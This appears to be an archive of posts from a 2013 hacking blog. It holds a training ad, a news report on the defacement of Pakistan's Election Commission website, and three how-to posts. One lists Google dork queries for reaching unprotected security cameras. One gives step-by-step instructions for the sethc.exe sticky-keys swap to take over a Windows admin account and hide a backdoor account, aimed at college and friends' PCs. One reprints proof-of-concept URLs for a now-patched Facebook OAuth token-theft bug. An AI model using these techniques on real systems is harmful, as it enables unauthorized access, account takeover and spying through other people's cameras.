Thursday, April 4, 2013

i3indya™ Technologies a globally recognized Company invites B.Tech/BE (any branch, year)/ MCA / BCA / MBA(IT) students for Summer Training/Internship 2013.

i3indya™ Technologies a globally recognized Company invites B.Tech/BE (any branch, year)/ MCA / BCA / MBA(IT) students for Summer Training/Internship 2013.

The internship courses are :
+Ethical Hacking & Cyber Security
+Embedded System & Robotics

Batches are starting from May-2013 till July-2013.
For More Details:

http://www.i3indya.com/training/summer-training/training-details-delhi-for-students.html
For Registration:
http://www.i3indya.com/register/summer-training-delhi.html

For Live Updates Visit : http://summertraining-2013.blogspot.in/

Join Summer Training Event: http://www.facebook.com/events/512606682134866/
Email :summertraining@i3indya.com
i3indya Helpline:
+91 - 956060 5666

Sunday, March 31, 2013

ECP website defaced by Indian hacker


The cyber attack on ECP’s website is being discussed across various internet forums with people complaining about being unable to visit the site.
KARACHI / ISLAMABAD: The Election Commission of Pakistan’s website was reportedly attacked by an Indian hacker on Friday. The website is currently down.
The attacker has defaced the home page and has possibly compromised its availability to visitors, according to a cyber expert.
The cyber attack on ECP’s website is being discussed across various internet forums with people complaining about being unable to visit the site. The attack came at a time when the traffic on the website increased ahead of the general elections.
As the cyber attack entered its second day on Saturday, the election commission decided to shift its website on another server, reported Geo News.
According to the report, the ECP has stated that all its data is secure despite the attack and the website would be restored after being shifted to another server. Sources also told Geo Newsthat the nomination papers of candidates will be uploaded on the website within the next few days.
The hacker, who identified himself as NIGh7 F0x, seemed to have hacked the website first then defaced its homepage and eventually compromised its availability, according to Rafay Baloch, a professional white hat – the term used for hackers who, against quick paybacks, assist world’s leading websites against possible cyber attacks by exposing their vulnerabilities.
The availability of any site is usually compromised through a distributed denial-of-service (DDoS) attack but this is too early to say if it was one, Baloch said. The other possibility could be the impact of the Spamhaus attack, the largest DDoS attack in the world’s history that has mainly affected North America and Europe and slowed down internet globally.
The Spamhaus attack could also compromise the availability of ECP’s website, Baloch said, because its host server is in the US.
The official government sites are at risk of such attacks because their host server PKNIC is vulnerable to basic-level cyber attacks, Baloch added. PKNIC is a shared registry system that manages the .pk domain name space (DNS) for Pakistani websites.
Indian black hats are targeting Pakistani websites almost on a daily basis with the Federal Investigation Agency being aware of the issue, according to Baloch.
Despite being attacked twice this year, PKNIC has not fixed those vulnerabilities, Baloch said.
ECP to shift website to new server
The Election Commission of Pakistan on Saturday acknowledged that its website had been hacked and said that it would be restored soon.
A spokesperson of ECP said that the authority has decided to shift its website on to another server and to employ enhanced security features.
“ECP’s website remained out of reach under a deliberate strategy to avoid loss of data and ensure security,” he said.
To a question, he said all the data of the Election Commission on the website was safe.
Nomination papers of the candidates would be uploaded on the website within next few days, he added.

How Security Camera's Are Being Hacked by GOOGLE


Hai guys today i am gonna tell you briefly about security camera hacking” How they are hacked using Google”
Disclaimer : Only for Education Purposes.
Guys you can have access in the security camera through out the world via google uncle … i call google as uncle bcz i do about 80% of my work through it …

1rst of all u have to use the IP of that country whose security camera you wanna hack bcz uncle google shows you results near by your location too

1st of all u open uncle google (www.google.com)
and type in search bar the codes wich i am going to give below !!
1st of all i am going to teach you guys about the unprotected cams of axis co. these cams are mostly developed by axis co. and there software will be obiviously named and linked by the name of axis
here are some  codes about axis cams
*inurl:indexFrame.shtml “Axis Video Server”
*intitle:Live View /- AXIS
*inurl:/view.shtml intitle:”Live View / – AXIS” |
*inurl:axis-cgi/jpg
*inurl:axis-cgi/mjpg (motion-JPEG)
*ntitle:”Live View / – AXIS”
*intitle:”Live View / – AXIS 206M”
*intitle:”Live View / – AXIS 206W”
*intitle:”Live View / – AXIS 210″
*inurl:indexFrame.shtml Axis
screenshot EXAMPLE!!
TYPE THE CODE IN SEARCH BAR



NOW SEE THE SEARCH RESULTS


NOW OPEN THE RESULT AN EXAMPLE IS BELOW


NOW I AM GOING TO TEACH YOU GUYS ABOUT THE CAM HACK OF FAMOUS AND WELL KNOWN CO> NAMED AS SOnIC .. HERE ARE SOME CODES FOR THE CAM OF SONIC>>
*intitle:”snc-rz30 home”
*intitle:snc-z20 inurl:home/
*intitle:snc-cs3
*intitle:snc-rz30 inurl:home/
*intitle:”sony network camera snc-p1″
*intitle:”sony network camera snc-m1
usually these sonic cams are secure and you have to BYPASS the security in my next post i will tell you how to by pass security!!

NOW I AM GOING TO GIVE YOU SUCH MORE CODES

*inurl:”viewerframe?mode=motion”
*inurl:LvAppl intitle:liveapplet
*inurl:view/view.shtml^
*inurl:ViewerFrame?Mode=
*inurl:ViewerFrame?Mode=Refresh
*inurl:view/indexFrame.shtml
*inurl:view/index.shtml
*inurl:view/view.shtml liveapplet
*intitle:”live view” intitle:axis
*intitle:liveapplet
*allintitle:”Network Camera NetworkCamera”
*intitle:liveapplet inurl:LvAppl
*intitle:”EvoCam”
*inurl:”webcam.html”
*intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
*intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
*intitle:”Live View / – AXIS 210″
*inurl:indexFrame.shtml Axis
*inurl:”MultiCameraFrame?Mode=Motion”
*intitle:start
*inurl:cgistart
*intitle:”WJ-NT104 Main Page”
*intext:”MOBOTIX M1″
*intext:”Open Menu”
*intext:”MOBOTIX M10″ intext:”Open Menu”
*intext:”MOBOTIX D10″
*intext:”Open Menu”
*intitle:”Toshiba Network Camera” user login
*intitle:”netcam live image”
*intitle:”i-Catcher Console – Web Monitor”
YOU CAN USE THESE VARIOUS CODES IN UNCLE GOOGLE SEARCH BAR

Wednesday, March 20, 2013

Hack administrators password through guest login



Learn to hack administrators password through guest login
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on...

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.


Procedure To Hack windows XP administrator Password

Method 1 (Change Admin Password)

Here is how to do that -

1.Go to C:/windows/system32

2.Copy cmd.exe and paste it on desktop

3.Rename cmd.exe to sethc.exe

4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.

6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

7.Now type “ NET USER ADMINISTRATOR aaa" where “aaa" can be any password you like and press enter.

8.You will see “ The Command completed successfully" and then exit the command prompt and login into
administrator with your new password.

9.Congrats You have hacked admin through guest account.
Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where " How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key





HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList


Here create a new "
 DWORD value", write its name as the “How to hack" (the username that you entered in the previous step),now you can live with your admin account forever :)
Note:For the ones that are having problems with step one: What I would do because you do not have write access to the directory you can use a live version of Linux. Copy the cmd.exe to a flash drive. Boot into Linux and copy the cmd.exe to the file that needs to be replaced. In Linux you can bypass those read/write permissions.

Wednesday, March 13, 2013

facebook-hacking-accounts-using-another OAuth Vulnerability

facebook hacking
Remember the last OAuth Flaw in Facebook, that allow an attacker to hijack any account without victim's interaction with any Facebook Application, was reported by white hat Hacker 'Nir Goldshlager'. After that Facebook security team fixed that issue using some minor changes.
Yesterday Goldshlager once again pwn Facebook OAuth mechanism by bypassing all those minor changes done by Facebook Team. He explains the complete Saga of hunting Facebook bug in a blog post.

In recent discovered technique hacker found that next parameter allow facebook.facebook.com domain as a valid option and multiple hash signs is now enough to bypass Regex Protection.

He use facebook.com/l.php file (used by Facebook to redirect users to external links) to redirect victims to his malicious Facebook application and then to his own server for storing token values, where tokens are the alternate access to any Facebook account without password. 
warnning
But a warning message while redirecting ruin the show ! No worries, he found that 5 bytes of data in redirection URL is able to bypass this warning message.

Example:  https://www.facebook.com/l/goldy;touch.facebook.com/apps/sdfsdsdsgs (where 'goldy' is the 5 byte of data used).

Now at the last step, He Redirect the victim to external websites located in files.nirgoldshlager.com (attacker server) via malicious Facebook app created by him and victim's access_token will be logged there. So here we have the final POC that can hack any Facebook account by exploiting another Facebook OAuth bug.

For all browsers:
https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token

For Firefox browser:
https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1

This bug was also reported to Facebook Security Team last week by Nir Goldshlager and patched now, if you are a hacker, we expect YOU to hack it again !